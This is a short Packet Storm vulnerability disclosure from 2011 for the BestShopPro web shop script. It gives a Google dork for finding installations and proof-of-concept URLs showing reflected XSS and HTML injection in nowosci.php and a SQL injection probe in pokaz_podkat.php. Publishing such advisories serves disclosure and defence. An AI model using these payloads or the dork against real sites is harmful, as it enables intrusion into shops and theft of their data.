BestShopPro SQL Injection / Cross Site Scripting

2011-11-02T00:00:00
ID PACKETSTORM:106510
Type packetstorm
Reporter CoBRa_21
Modified 2011-11-02T00:00:00

Description

                                        
                                            `################################################################################################  
# Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities  
#  
# Author : CoBRa_21  
#  
# E-Mail : uyku_cu [at] windowslive.com  
#  
# Google Dork : "Powered By BST"  
#  
# Script Page : http://www.bst.pl  
################################################################################################  
#  
# XSS:  
#  
# http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>  
#  
# HTML:  
#  
# http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>  
#  
# SQL :  
#  
# http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)  
#  
################################################################################################  
  
`